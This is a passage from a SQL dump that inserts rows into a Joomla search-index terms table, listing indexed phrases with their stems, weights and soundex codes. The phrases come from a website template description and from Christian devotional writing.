(189672, 'or corporate site', 'or corporate site', 0, 1, 1.5667, 'O62616323', 1, '*'),
(189673, 'or google', 'or google', 0, 1, 1.3, 'O624', 1, '*'),
(189674, 'or google fonts', 'or google fonts', 0, 1, 1.5, 'O6241532', 1, '*'),
(189675, 'over 60', 'over 60', 0, 1, 1.2333, 'O160', 1, '*'),
(189676, 'over 60 html', 'over 60 html', 0, 1, 1.4, 'O16354', 1, '*'),
(189677, 'overall', 'overal', 0, 0, 0.4667, 'O164', 1, '*'),
(189678, 'overall style', 'overal style', 0, 1, 1.4333, 'O164234', 1, '*'),
(189679, 'overall style to', 'overal style to', 0, 1, 1.5333, 'O1642343', 1, '*'),
(189680, 'page', 'page', 0, 0, 0.2667, 'P200', 1, '*'),
(189681, 'page filterable', 'page filterable', 0, 1, 1.5, 'P2143614', 1, '*'),
(189682, 'page filterable portfolio', 'page filterable portfolio', 0, 1, 1.8333, 'P214361416314', 1, '*'),
(189683, 'page included', 'page included', 0, 1, 1.4333, 'P25243', 1, '*'),
(189684, 'page included 10', 'page included 10', 0, 1, 1.5333, 'P25243', 1, '*'),
(189685, 'page layout', 'page layout', 0, 1, 1.3667, 'P243', 1, '*'),
(189686, 'page layout combinations', 'page layout combinations', 0, 1, 1.8, 'P2432515352', 1, '*'),
(189687, 'page refresh', 'page refresh', 0, 1, 1.4, 'P26162', 1, '*'),
(189688, 'page refresh advanced', 'page refresh advanced', 0, 1, 1.7, 'P2616231523', 1, '*'),
(189689, 'pages', 'page', 0, 0, 0.3333, 'P200', 1, '*'),
(189690, 'pages demo', 'page demo', 0, 1, 1.3333, 'P235', 1, '*'),
(189691, 'pages demo data', 'page demo data', 0, 1, 1.5, 'P2353', 1, '*'),
(189692, 'pages included', 'page included', 0, 1, 1.4667, 'P25243', 1, '*'),
(189693, 'pages included 6', 'page included 6', 0, 1, 1.5333, 'P25243', 1, '*'),
(189694, 'pagination', 'pagin', 0, 0, 0.6667, 'P2535', 1, '*'),
(189695, 'pagination multiple', 'pagin multiple', 0, 1, 1.6333, 'P25354314', 1, '*'),
(189696, 'pagination multiple page', 'pagin multiple page', 0, 1, 1.8, 'P2535431412', 1, '*'),
(189697, 'pointer google', 'pointer google', 0, 1, 1.4667, 'P53624', 1, '*'),
(189698, 'pointer google charts', 'pointer google charts', 0, 1, 1.7, 'P536242632', 1, '*'),
(189699, 'portfolio', 'portfolio', 0, 0, 0.6, 'P6314', 1, '*'),
(189700, 'portfolio sidebar', 'portfolio sidebar', 0, 1, 1.5667, 'P63142316', 1, '*'),
(189701, 'portfolio sidebar navigation', 'portfolio sidebar navigation', 0, 1, 1.9333, 'P6314231651235', 1, '*'),
(189702, 'preset', 'preset', 0, 0, 0.4, 'P623', 1, '*'),
(189703, 'preset pages', 'preset pages', 0, 1, 1.4, 'P62312', 1, '*'),
(189704, 'preset pages demo', 'preset pages demo', 0, 1, 1.5667, 'P6231235', 1, '*'),
(189705, 'presets', 'preset', 0, 0, 0.4667, 'P6232', 1, '*'),
(189706, 'presets for', 'preset for', 0, 1, 1.3667, 'P623216', 1, '*'),
(189707, 'presets for colors', 'preset for colors', 0, 1, 1.6, 'P6232162462', 1, '*'),
(189708, 'pricing', 'price', 0, 0, 0.4667, 'P6252', 1, '*'),
(189709, 'pricing tables', 'price tables', 0, 1, 1.4667, 'P62523142', 1, '*'),
(189710, 'pricing tables with', 'price tables with', 0, 1, 1.6333, 'P625231423', 1, '*'),
(189711, 'refresh advanced', 'refresh advanced', 0, 1, 1.5333, 'R16231523', 1, '*'),
(189712, 'refresh advanced multi-level', 'refresh advanced multi-level', 0, 1, 1.9333, 'R16231523543414', 1, '*'),
(189713, 'reloading', 'reload', 0, 0, 0.6, 'R4352', 1, '*'),
(189714, 'reloading page', 'reload page', 0, 1, 1.4667, 'R435212', 1, '*'),
(189715, 'reloading page filterable', 'reload page filterable', 0, 1, 1.8333, 'R435212143614', 1, '*'),
(189716, 'results without', 'result without', 0, 1, 1.5, 'R24323', 1, '*'),
(189717, 'results without reloading', 'result without reloading', 0, 1, 1.8333, 'R2432364352', 1, '*'),
(189718, 'safari', 'safari', 0, 0, 0.4, 'S160', 1, '*'),
(189719, 'safari working', 'safari working', 0, 1, 1.4667, 'S16252', 1, '*'),
(189720, 'safari working contact', 'safari working contact', 0, 1, 1.7333, 'S162525323', 1, '*'),
(189721, 'seo', 'seo', 0, 0, 0.2, 'S000', 1, '*'),
(189722, 'seo friendly', 'seo friendly', 0, 1, 1.4, 'S16534', 1, '*'),
(189723, 'seo friendly and', 'seo friendly and', 0, 1, 1.5333, 'S1653453', 1, '*'),
(189724, 'sidebar', 'sidebar', 0, 0, 0.4667, 'S316', 1, '*'),
(189725, 'sidebar navigation', 'sidebar navigation', 0, 1, 1.6, 'S31651235', 1, '*'),
(189726, 'sidebar navigation menu', 'sidebar navigation menu', 0, 1, 1.7667, 'S31651235', 1, '*'),
(189727, 'site', 'site', 0, 0, 0.2667, 'S300', 1, '*'),
(189728, 'site beulah', 'site beulah', 0, 1, 1.3667, 'S314', 1, '*'),
(189729, 'site beulah includes', 'site beulah includes', 0, 1, 1.6667, 'S31452432', 1, '*'),
(189730, 'six', 'six', 0, 0, 0.2, 'S000', 2, '*'),
(189731, 'six columns', 'six columns', 0, 1, 1.3667, 'S452', 1, '*'),
(189732, 'six columns get', 'six columns get', 0, 1, 1.5, 'S4523', 1, '*'),
(189733, 'slider', 'slider', 0, 0, 0.4, 'S436', 1, '*'),
(189734, 'slider with', 'slider with', 0, 1, 1.3667, 'S4363', 1, '*'),
(189735, 'slider with video', 'slider with video', 0, 1, 1.5667, 'S436313', 1, '*'),
(189736, 'sliders', 'slider', 0, 0, 0.4667, 'S4362', 1, '*'),
(189737, 'sliders included', 'slider included', 0, 1, 1.5333, 'S43625243', 1, '*'),
(189738, 'sliders included well', 'slider included well', 0, 1, 1.7, 'S436252434', 1, '*'),
(189739, 'solid', 'solid', 0, 0, 0.3333, 'S430', 1, '*'),
(189740, 'solid typography', 'solid typography', 0, 1, 1.5333, 'S431261', 1, '*'),
(189741, 'solid typography with', 'solid typography with', 0, 1, 1.7, 'S4312613', 1, '*'),
(189742, 'spans', 'span', 0, 0, 0.3333, 'S152', 1, '*'),
(189743, 'spans 404', 'span 404', 0, 1, 1.3, 'S152', 1, '*'),
(189744, 'spans 404 error', 'span 404 error', 0, 1, 1.5, 'S1526', 1, '*'),
(189745, 'static', 'static', 0, 0, 0.4, 'S320', 1, '*'),
(189746, 'static and', 'static and', 0, 1, 1.3333, 'S3253', 1, '*'),
(189747, 'static and interactive', 'static and interactive', 0, 1, 1.7333, 'S3253536231', 1, '*'),
(189748, 'style to', 'style to', 0, 1, 1.2667, 'S343', 1, '*'),
(189749, 'style to fit', 'style to fit', 0, 1, 1.4, 'S34313', 1, '*'),
(189750, 'styled', 'style', 0, 0, 0.4, 'S343', 1, '*'),
(189751, 'styled blog', 'style blog', 0, 1, 1.3667, 'S343142', 1, '*'),
(189752, 'styled blog pagination', 'style blog pagination', 0, 1, 1.7333, 'S34314212535', 1, '*'),
(189753, 'styles here', 'style here', 0, 1, 1.3667, 'S3426', 1, '*'),
(189754, 'styles here clean', 'style here clean', 0, 1, 1.5667, 'S3426245', 1, '*'),
(189755, 'styles over', 'style over', 0, 1, 1.3667, 'S34216', 1, '*'),
(189756, 'styles over 60', 'style over 60', 0, 1, 1.4667, 'S34216', 1, '*'),
(189757, 'subscription', 'subscript', 0, 0, 0.8, 'S126135', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(189758, 'subscription widget', 'subscript widget', 0, 1, 1.6333, 'S126135323', 1, '*'),
(189759, 'subscription widget without', 'subscript widget without', 0, 1, 1.9, 'S126135323', 1, '*'),
(189760, 'suitable', 'suitabl', 0, 0, 0.5333, 'S314', 1, '*'),
(189761, 'suitable for', 'suitabl for', 0, 1, 1.4, 'S31416', 1, '*'),
(189762, 'suitable for all', 'suitabl for all', 0, 1, 1.5333, 'S314164', 1, '*'),
(189763, 'support', 'support', 0, 0, 0.4667, 'S163', 1, '*'),
(189764, 'support styled', 'support styled', 0, 1, 1.4667, 'S1632343', 1, '*'),
(189765, 'support styled blog', 'support styled blog', 0, 1, 1.6333, 'S1632343142', 1, '*'),
(189766, 'tables', 'tabl', 0, 0, 0.4, 'T142', 1, '*'),
(189767, 'tables blockquotes', 'tabl blockquotes', 0, 1, 1.6, 'T14214232', 1, '*'),
(189768, 'tables blockquotes code', 'tabl blockquotes code', 0, 1, 1.7667, 'T142142323', 1, '*'),
(189769, 'tables with', 'tabl with', 0, 1, 1.3667, 'T1423', 1, '*'),
(189770, 'tables with up', 'tabl with up', 0, 1, 1.4667, 'T14231', 1, '*'),
(189771, 'tags', 'tag', 0, 0, 0.2667, 'T200', 1, '*'),
(189772, 'tags with', 'tag with', 0, 1, 1.3, 'T230', 1, '*'),
(189773, 'tags with fallback', 'tag with fallback', 0, 1, 1.6, 'T231412', 1, '*'),
(189774, 'template is', 'templat is', 0, 1, 1.3667, 'T51432', 1, '*'),
(189775, 'template is a', 'templat is a', 0, 1, 1.4333, 'T51432', 1, '*'),
(189776, 'template released', 'templat released', 0, 1, 1.5667, 'T51436423', 1, '*'),
(189777, 'testimonials', 'testimoni', 0, 0, 0.8, 'T23542', 1, '*'),
(189778, 'testimonials widget', 'testimoni widget', 0, 1, 1.6333, 'T23542323', 1, '*'),
(189779, 'testimonials widget twitter', 'testimoni widget twitter', 0, 1, 1.9, 'T235423236', 1, '*'),
(189780, 'textures', 'textur', 0, 0, 0.5333, 'T2362', 1, '*'),
(189781, 'textures and', 'textur and', 0, 1, 1.4, 'T236253', 1, '*'),
(189782, 'textures and fonts', 'textur and fonts', 0, 1, 1.6, 'T2362531532', 1, '*'),
(189783, 'textures which', 'textur which', 0, 1, 1.4667, 'T2362', 1, '*'),
(189784, 'textures which makes', 'textur which makes', 0, 1, 1.6667, 'T236252', 1, '*'),
(189785, 'the features', 'the features', 0, 1, 1.4, 'T1362', 1, '*'),
(189786, 'the features at', 'the features at', 0, 1, 1.5, 'T13623', 1, '*'),
(189787, 'the overall', 'the overall', 0, 1, 1.3667, 'T164', 1, '*'),
(189788, 'the overall style', 'the overall style', 0, 1, 1.5667, 'T164234', 1, '*'),
(189789, 'title color', 'titl color', 0, 1, 1.3667, 'T4246', 1, '*'),
(189790, 'title color spans', 'titl color spans', 0, 1, 1.5667, 'T42462152', 1, '*'),
(189791, 'to 8', 'to 8', 0, 1, 1.1333, 'T000', 1, '*'),
(189792, 'to 8 chrome', 'to 8 chrome', 0, 1, 1.3667, 'T265', 1, '*'),
(189793, 'to customize', 'to customize', 0, 1, 1.4, 'T2352', 1, '*'),
(189794, 'to customize the', 'to customize the', 0, 1, 1.5333, 'T23523', 1, '*'),
(189795, 'to fit', 'to fit', 0, 1, 1.2, 'T130', 1, '*'),
(189796, 'to fit your', 'to fit your', 0, 1, 1.3667, 'T136', 1, '*'),
(189797, 'to six', 'to six', 0, 1, 1.2, 'T200', 1, '*'),
(189798, 'to six columns', 'to six columns', 0, 1, 1.4667, 'T2452', 1, '*'),
(189799, 'tooltips', 'tooltip', 0, 0, 0.5333, 'T4312', 1, '*'),
(189800, 'tooltips elegant', 'tooltip elegant', 0, 1, 1.5333, 'T43124253', 1, '*'),
(189801, 'tooltips elegant pricing', 'tooltip elegant pricing', 0, 1, 1.8, 'T4312425316252', 1, '*'),
(189802, 'twitter', 'twitter', 0, 0, 0.4667, 'T600', 2, '*'),
(189803, 'twitter widget', 'twitter widget', 0, 1, 1.4667, 'T6323', 1, '*'),
(189804, 'twitter widget jquery', 'twitter widget jquery', 0, 1, 1.7, 'T632326', 1, '*'),
(189805, 'typography', 'typographi', 0, 0, 0.6667, 'T1261', 1, '*'),
(189806, 'typography with', 'typographi with', 0, 1, 1.5, 'T12613', 1, '*'),
(189807, 'typography with lists', 'typographi with lists', 0, 1, 1.7, 'T126134232', 1, '*'),
(189808, 'ui', 'ui', 0, 0, 0.1333, 'U000', 1, '*'),
(189809, 'ui css3', 'ui css3', 0, 1, 1.2333, 'U200', 1, '*'),
(189810, 'ui css3 font', 'ui css3 font', 0, 1, 1.4, 'U2153', 1, '*'),
(189811, 'unique', 'uniqu', 0, 0, 0.4, 'U520', 1, '*'),
(189812, 'unique color', 'uniqu color', 0, 1, 1.4, 'U5246', 1, '*'),
(189813, 'unique color styles', 'uniqu color styles', 0, 1, 1.6333, 'U52462342', 1, '*'),
(189814, 'up to six', 'up to six', 0, 1, 1.3, 'U132', 1, '*'),
(189815, 'used css3', 'us css3', 0, 1, 1.3, 'U232', 1, '*'),
(189816, 'used css3 tags', 'us css3 tags', 0, 1, 1.4667, 'U23232', 1, '*'),
(189817, 'using a', 'us a', 0, 1, 1.2333, 'U252', 1, '*'),
(189818, 'using a blend', 'us a blend', 0, 1, 1.4333, 'U2521453', 1, '*'),
(189819, 'using html5', 'us html5', 0, 1, 1.3667, 'U252354', 1, '*'),
(189820, 'using html5 css3', 'us html5 css3', 0, 1, 1.5333, 'U2523542', 1, '*'),
(189821, 'validation', 'valid', 0, 0, 0.6667, 'V435', 1, '*'),
(189822, 'validation and', 'valid and', 0, 1, 1.4667, 'V4353', 1, '*'),
(189823, 'validation and ajax', 'valid and ajax', 0, 1, 1.6333, 'V43532', 1, '*'),
(189824, 'variations', 'variat', 0, 0, 0.6667, 'V6352', 1, '*'),
(189825, 'variations testimonials', 'variat testimonials', 0, 1, 1.7667, 'V6352323542', 1, '*'),
(189826, 'variations testimonials widget', 'variat testimonials widget', 0, 1, 2, 'V6352323542323', 1, '*'),
(189827, 'variety', 'varieti', 0, 0, 0.4667, 'V630', 1, '*'),
(189828, 'variety of', 'varieti of', 0, 1, 1.3333, 'V631', 1, '*'),
(189829, 'variety of presets', 'varieti of presets', 0, 1, 1.6, 'V6316232', 1, '*'),
(189830, 'video support', 'video support', 0, 1, 1.4333, 'V32163', 1, '*'),
(189831, 'video support styled', 'video support styled', 0, 1, 1.6667, 'V321632343', 1, '*'),
(189832, 'websites', 'websit', 0, 0, 0.5333, 'W1232', 1, '*'),
(189833, 'websites especially', 'websit especially', 0, 1, 1.6333, 'W1232124', 1, '*'),
(189834, 'websites especially for', 'websit especially for', 0, 1, 1.7667, 'W123212416', 1, '*'),
(189835, 'well documented', 'well documented', 0, 1, 1.5, 'W43253', 1, '*'),
(189836, 'well documented enhanced', 'well documented enhanced', 0, 1, 1.8, 'W43253523', 1, '*'),
(189837, 'which makes', 'which makes', 0, 1, 1.3667, 'W252', 1, '*'),
(189838, 'which makes it', 'which makes it', 0, 1, 1.4667, 'W2523', 1, '*'),
(189839, 'widget', 'widget', 0, 0, 0.4, 'W323', 1, '*'),
(189840, 'widget jquery', 'widget jquery', 0, 1, 1.4333, 'W32326', 1, '*'),
(189841, 'widget jquery tooltips', 'widget jquery tooltips', 0, 1, 1.7333, 'W3232634312', 1, '*'),
(189842, 'widget twitter', 'widget twitter', 0, 1, 1.4667, 'W3236', 1, '*'),
(189843, 'widget twitter widget', 'widget twitter widget', 0, 1, 1.7, 'W3236323', 1, '*'),
(189844, 'widget variations', 'widget variations', 0, 1, 1.5667, 'W32316352', 1, '*'),
(189845, 'widget variations testimonials', 'widget variations testimonials', 0, 1, 2, 'W32316352323542', 1, '*'),
(189846, 'widget without', 'widget without', 0, 1, 1.4667, 'W323', 1, '*'),
(189847, 'widget without page', 'widget without page', 0, 1, 1.6333, 'W32312', 1, '*'),
(189848, 'with dynamic', 'with dynamic', 0, 1, 1.4, 'W352', 1, '*'),
(189849, 'with dynamic location', 'with dynamic location', 0, 1, 1.7, 'W3524235', 1, '*'),
(189850, 'with fallback', 'with fallback', 0, 1, 1.4333, 'W31412', 1, '*'),
(189851, 'with fallback on', 'with fallback on', 0, 1, 1.5333, 'W314125', 1, '*'),
(189852, 'with indents', 'with indents', 0, 1, 1.4, 'W353532', 1, '*'),
(189853, 'with indents form', 'with indents form', 0, 1, 1.5667, 'W353532165', 1, '*'),
(189854, 'with lists', 'with lists', 0, 1, 1.3333, 'W34232', 1, '*'),
(189855, 'with lists content', 'with lists content', 0, 1, 1.6, 'W342325353', 1, '*'),
(189856, 'with up', 'with up', 0, 1, 1.2333, 'W310', 1, '*'),
(189857, 'with up to', 'with up to', 0, 1, 1.3333, 'W313', 1, '*'),
(189858, 'with validation', 'with validation', 0, 1, 1.5, 'W31435', 1, '*'),
(189859, 'with validation and', 'with validation and', 0, 1, 1.6333, 'W314353', 1, '*'),
(189860, 'with video', 'with video', 0, 1, 1.3333, 'W313', 1, '*'),
(189861, 'with video support', 'with video support', 0, 1, 1.6, 'W3132163', 1, '*'),
(189862, 'without page', 'without page', 0, 1, 1.4, 'W312', 1, '*'),
(189863, 'without page refresh', 'without page refresh', 0, 1, 1.6667, 'W3126162', 1, '*'),
(189864, 'without reloading', 'without reloading', 0, 1, 1.5667, 'W364352', 1, '*'),
(189865, 'without reloading page', 'without reloading page', 0, 1, 1.7333, 'W36435212', 1, '*'),
(189866, 'working contact', 'work contact', 0, 1, 1.5, 'W62525323', 1, '*'),
(189867, 'working contact form', 'work contact form', 0, 1, 1.6667, 'W62525323165', 1, '*'),
(189868, 'working newsletter', 'work newsletter', 0, 1, 1.6, 'W625252436', 1, '*'),
(189869, 'working newsletter subscription', 'work newsletter subscription', 0, 1, 2, 'W6252524362126135', 1, '*'),
(189870, 'you to customize', 'you to customize', 0, 1, 1.5333, 'Y32352', 1, '*'),
(189871, 'your needs', 'your needs', 0, 1, 1.3333, 'Y6532', 1, '*'),
(190326, '10 22', '10 22', 0, 1, 1.1667, '', 2, '*'),
(190412, 'abundance', 'abund', 0, 0, 0.6, 'A15352', 3, '*'),
(190417, 'activate', 'activ', 0, 0, 0.5333, 'A2313', 4, '*'),
(190497, 'anointing and', 'anoint and', 0, 1, 1.4333, 'A535253', 2, '*'),
(190549, 'be more', 'be more', 0, 1, 1.2333, 'B560', 3, '*'),
(190582, 'blessings', 'bless', 0, 0, 0.6, 'B4252', 5, '*'),
(190689, 'conclusion', 'conclus', 0, 0, 0.6667, 'C52425', 2, '*'),
(190694, 'connect', 'connect', 0, 0, 0.4667, 'C523', 4, '*'),
(190695, 'connect to', 'connect to', 0, 1, 1.3333, 'C523', 3, '*'),
(190696, 'connect to the', 'connect to the', 0, 1, 1.4667, 'C523', 2, '*'),
(190697, 'connect you', 'connect you', 0, 1, 1.3667, 'C523', 2, '*'),
(190698, 'connect you to', 'connect you to', 0, 1, 1.4667, 'C523', 2, '*'),
(190701, 'consider the', 'consid the', 0, 1, 1.4, 'C52363', 2, '*'),
(190722, 'cut', 'cut', 0, 0, 0.2, 'C300', 4, '*'),
(190897, 'flows', 'flow', 0, 0, 0.3333, 'F420', 2, '*'),
(190906, 'for divine', 'for divine', 0, 1, 1.3333, 'F6315', 4, '*'),
(190925, 'forth in', 'forth in', 0, 1, 1.2667, 'F635', 2, '*'),
(190935, 'from the lord', 'from the lord', 0, 1, 1.4333, 'F653463', 3, '*'),
(190953, 'future of', 'futur of', 0, 1, 1.3, 'F361', 2, '*'),
(190973, 'god be', 'god be', 0, 1, 1.2, 'G310', 4, '*'),
(190987, 'god what', 'god what', 0, 1, 1.2667, 'G300', 2, '*'),
(190989, 'god who', 'god who', 0, 1, 1.2333, 'G300', 4, '*'),
(191017, 'grows', 'grow', 0, 0, 0.3333, 'G620', 3, '*'),
(191150, 'it at', 'it at', 0, 1, 1.1667, 'I300', 2, '*'),
(191151, 'it at the', 'it at the', 0, 1, 1.3, 'I300', 2, '*'),
(191202, 'let god', 'let god', 0, 1, 1.2333, 'L323', 3, '*'),
(191203, 'let god be', 'let god be', 0, 1, 1.3333, 'L3231', 2, '*'),
(191309, 'not by', 'not by', 0, 1, 1.2, 'N310', 2, '*'),
(191317, 'not get', 'not get', 0, 1, 1.2333, 'N323', 2, '*'),
(191337, 'of divine', 'of divine', 0, 1, 1.3, 'O1315', 5, '*'),
(191342, 'of god for', 'of god for', 0, 1, 1.3333, 'O12316', 5, '*'),
(191393, 'over the', 'over the', 0, 1, 1.2667, 'O163', 6, '*'),
(191441, 'prayer and', 'prayer and', 0, 1, 1.3333, 'P653', 3, '*'),
(191478, 'put yourself', 'put yourself', 0, 1, 1.4, 'P36241', 2, '*'),
(191505, 'run', 'run', 0, 0, 0.2, 'R500', 1, '*'),
(191516, 'scale', 'scale', 0, 0, 0.3333, 'S400', 3, '*'),
(191524, 'scriptural', 'scriptur', 0, 0, 0.6667, 'S61364', 4, '*'),
(191549, 'seeds', 'seed', 0, 0, 0.3333, 'S320', 2, '*'),
(191578, 'sow your', 'sow your', 0, 1, 1.2667, 'S600', 2, '*'),
(191596, 'standards', 'standard', 0, 0, 0.6, 'S353632', 4, '*'),
(191633, 'system', 'system', 0, 0, 0.4, 'S350', 2, '*'),
(191662, 'that will help', 'that will help', 0, 1, 1.4667, 'T410', 2, '*'),
(191665, 'that will make', 'that will make', 0, 1, 1.4667, 'T452', 2, '*'),
(191670, 'the abundance', 'the abundance', 0, 1, 1.4333, 'T15352', 2, '*'),
(191721, 'the steps', 'the steps', 0, 1, 1.3, 'T2312', 3, '*'),
(191735, 'they will be', 'thei will be', 0, 1, 1.4, 'T410', 2, '*'),
(191776, 'to have the', 'to have the', 0, 1, 1.3667, 'T130', 3, '*'),
(191846, 'what are', 'what are', 0, 1, 1.2667, 'W360', 2, '*'),
(191871, 'will connect', 'will connect', 0, 1, 1.4, 'W42523', 2, '*'),
(191878, 'will help you', 'will help you', 0, 1, 1.4333, 'W410', 2, '*'),
(191919, 'you are the', 'you are the', 0, 1, 1.3667, 'Y630', 2, '*'),
(191923, 'you can make', 'you can make', 0, 1, 1.4, 'Y252', 2, '*'),
(191945, 'you to the', 'you to the', 0, 1, 1.3333, 'Y300', 5, '*'),
(192372, '1-22', '1-22', 0, 0, 0.4, '', 2, '*'),
(192391, '16-21', '16-21', 0, 0, 0.5, '', 2, '*'),
(192400, '18-19', '18-19', 0, 0, 0.5, '', 2, '*'),
(192420, '21-24', '21-24', 0, 0, 0.5, '', 2, '*'),
(192446, '32', '32', 0, 0, 0.2, '', 2, '*'),
(192449, '35', '35', 0, 0, 0.2, '', 7, '*'),
(192460, '5-8', '5-8', 0, 0, 0.3, '', 2, '*'),
(192488, 'a wrong', 'a wrong', 0, 1, 1.2333, 'A652', 2, '*'),
(192490, 'above the', 'abov the', 0, 1, 1.3, 'A130', 3, '*'),
(192492, 'accepted', 'accept', 0, 0, 0.5333, 'A213', 4, '*'),
(192524, 'are saved', 'ar saved', 0, 1, 1.3, 'A6213', 2, '*'),
(192537, 'be like', 'be like', 0, 1, 1.2333, 'B420', 2, '*'),
(192545, 'before god and', 'befor god and', 0, 1, 1.4667, 'B62353', 2, '*'),
(192547, 'behaviour', 'behaviour', 0, 0, 0.6, 'B600', 3, '*'),
(192558, 'but that', 'but that', 0, 1, 1.2667, 'B300', 3, '*'),
(192564, 'chosen', 'chosen', 0, 0, 0.4, 'C500', 3, '*'),
(192595, 'defiled', 'defil', 0, 0, 0.4667, 'D143', 2, '*'),
(192619, 'examine', 'examin', 0, 0, 0.4667, 'E250', 3, '*'),
(192705, 'how we', 'how we', 0, 1, 1.2, 'H000', 2, '*'),
(192743, 'james 1', 'jame 1', 0, 1, 1.2333, 'J520', 3, '*'),
(192830, 'now i', 'now i', 0, 1, 1.1667, 'N000', 2, '*'),
(192947, 'so they', 'so they', 0, 1, 1.2333, 'S300', 2, '*'),
(192970, 'that of', 'that of', 0, 1, 1.2333, 'T100', 2, '*'),
(192976, 'that ye', 'that ye', 0, 1, 1.2333, 'T000', 2, '*'),
(193000, 'though', 'though', 0, 0, 0.4, 'T200', 4, '*'),
(193007, 'time of', 'time of', 0, 1, 1.2333, 'T510', 2, '*'),
(193043, 'up with', 'up with', 0, 1, 1.2333, 'U130', 2, '*'),
(193044, 'values and', 'valu and', 0, 1, 1.3333, 'V4253', 3, '*'),
(193056, 'we can do', 'we can do', 0, 1, 1.3, 'W253', 2, '*'),
(193085, 'with what', 'with what', 0, 1, 1.3, 'W300', 2, '*'),
(193103, 'you are saved', 'you are saved', 0, 1, 1.4333, 'Y6213', 2, '*'),
(193121, '“christ', '“christ', 0, 0, 0.4667, '“2623', 2, '*'),
(197484, '1 1', '1 1', 0, 1, 1.1, '', 1, '*'),
(197485, '1 1 acct', '1 1 acct', 0, 1, 1.2667, 'A230', 1, '*'),
(197486, '1 acct', '1 acct', 0, 1, 1.2, 'A230', 1, '*'),
(197487, '1 acct 9', '1 acct 9', 0, 1, 1.2667, 'A230', 1, '*'),
(197488, '1 gen', '1 gen', 0, 1, 1.1667, 'G500', 1, '*'),
(197489, '1 gen 2', '1 gen 2', 0, 1, 1.2333, 'G500', 1, '*'),
(197490, '1 gen 26', '1 gen 26', 0, 1, 1.2667, 'G500', 1, '*'),
(197491, '1 quote', '1 quote', 0, 1, 1.2333, 'Q300', 1, '*'),
(197492, '1 quote pls', '1 quote pls', 0, 1, 1.3667, 'Q3142', 1, '*'),
(197493, '1 samuel', '1 samuel', 0, 1, 1.2667, 'S540', 3, '*'),
(197494, '1 samuel 30', '1 samuel 30', 0, 1, 1.3667, 'S540', 1, '*'),
(197495, '1-2 josh', '1-2 josh', 0, 1, 1.2667, 'J000', 1, '*'),
(197496, '1-2 josh 1', '1-2 josh 1', 0, 1, 1.3333, 'J000', 1, '*'),
(197497, '1-3 13', '1-3 13', 0, 1, 1.2, '', 1, '*'),
(197498, '1-3 13 14', '1-3 13 14', 0, 1, 1.3, '', 1, '*'),
(197499, '1-6 he', '1-6 he', 0, 1, 1.2, 'H000', 1, '*'),
(197500, '1-6 he will', '1-6 he will', 0, 1, 1.3667, 'H400', 1, '*'),
(197501, '1-end', '1-end', 0, 0, 0.3333, 'E530', 1, '*'),
(197502, '1-end 1', '1-end 1', 0, 1, 1.2333, 'E530', 1, '*'),
(197503, '1-end 1 samuel', '1-end 1 samuel', 0, 1, 1.4667, 'E53254', 1, '*'),
(197504, '12 1-3', '12 1-3', 0, 1, 1.2, '', 1, '*'),
(197505, '12 1-3 13', '12 1-3 13', 0, 1, 1.3, '', 1, '*'),
(197506, '121', '121', 0, 0, 0.3, '', 1, '*'),
(197507, '121 5-8', '121 5-8', 0, 1, 1.2333, '', 1, '*'),
(197508, '121 5-8 divine', '121 5-8 divine', 0, 1, 1.4667, 'D150', 1, '*'),
(197509, '125', '125', 0, 0, 0.3, '', 1, '*'),
(197510, '125 3', '125 3', 0, 1, 1.1667, '', 1, '*'),
(197511, '125 3 satan\'s', '125 3 satan', 0, 1, 1.4333, 'S352', 1, '*'),
(197512, '128', '128', 0, 0, 0.3, '', 1, '*'),
(197513, '128 1-6', '128 1-6', 0, 1, 1.2333, '', 1, '*'),
(197514, '128 1-6 he', '128 1-6 he', 0, 1, 1.3333, 'H000', 1, '*'),
(197515, '128 1-end', '128 1-end', 0, 1, 1.3, 'E530', 1, '*'),
(197516, '128 1-end 1', '128 1-end 1', 0, 1, 1.3667, 'E530', 1, '*'),
(197517, '13 14', '13 14', 0, 1, 1.1667, '', 1, '*'),
(197518, '13 14 15', '13 14 15', 0, 1, 1.2667, '', 1, '*'),
(197519, '13 gen', '13 gen', 0, 1, 1.2, 'G500', 1, '*'),
(197520, '13 gen 12', '13 gen 12', 0, 1, 1.3, 'G500', 1, '*'),
(197521, '13-16 exo', '13-16 exo', 0, 1, 1.3, 'E200', 1, '*'),
(197522, '13-16 exo 3', '13-16 exo 3', 0, 1, 1.3667, 'E200', 1, '*'),
(197523, '14 15', '14 15', 0, 1, 1.1667, '', 1, '*'),
(197524, '14 15 1', '14 15 1', 0, 1, 1.2333, '', 1, '*'),
(197525, '15 1', '15 1', 0, 1, 1.1333, '', 1, '*'),
(197526, '15 1 gen', '15 1 gen', 0, 1, 1.2667, 'G500', 1, '*'),
(197527, '16 gen', '16 gen', 0, 1, 1.2, 'G500', 1, '*'),
(197528, '16 gen 3', '16 gen 3', 0, 1, 1.2667, 'G500', 1, '*'),
(197529, '18 18-19', '18 18-19', 0, 1, 1.2667, '', 1, '*'),
(197530, '18 18-19 lord', '18 18-19 lord', 0, 1, 1.4333, 'L630', 1, '*'),
(197531, '18 31', '18 31', 0, 1, 1.1667, '', 1, '*'),
(197532, '18 31 psalm', '18 31 psalm', 0, 1, 1.3667, 'P245', 1, '*'),
(197533, '18-19 lord', '18-19 lord', 0, 1, 1.3333, 'L630', 1, '*'),
(197534, '18-19 lord work', '18-19 lord work', 0, 1, 1.5, 'L6362', 1, '*'),
(197535, '1sam', '1sam', 0, 0, 0.2667, 'S500', 2, '*'),
(197536, '1sam 25', '1sam 25', 0, 1, 1.2333, 'S500', 1, '*'),
(197537, '1sam 25 28-30', '1sam 25 28-30', 0, 1, 1.4333, 'S500', 1, '*'),
(197538, '2 16', '2 16', 0, 1, 1.1333, '', 1, '*'),
(197539, '2 16 gen', '2 16 gen', 0, 1, 1.2667, 'G500', 1, '*'),
(197540, '2 psalm', '2 psalm', 0, 1, 1.2333, 'P245', 1, '*'),
(197541, '2 psalm 68', '2 psalm 68', 0, 1, 1.3333, 'P245', 1, '*'),
(197542, '2-3,gen', '2-3,gen', 0, 0, 0.4667, 'G500', 1, '*'),
(197543, '2-3,gen 28', '2-3,gen 28', 0, 1, 1.3333, 'G500', 1, '*'),
(197544, '2-3,gen 28 13-16', '2-3,gen 28 13-16', 0, 1, 1.5333, 'G500', 1, '*'),
(197545, '21 1', '21 1', 0, 1, 1.1333, '', 1, '*'),
(197546, '21 1 quote', '21 1 quote', 0, 1, 1.3333, 'Q300', 1, '*'),
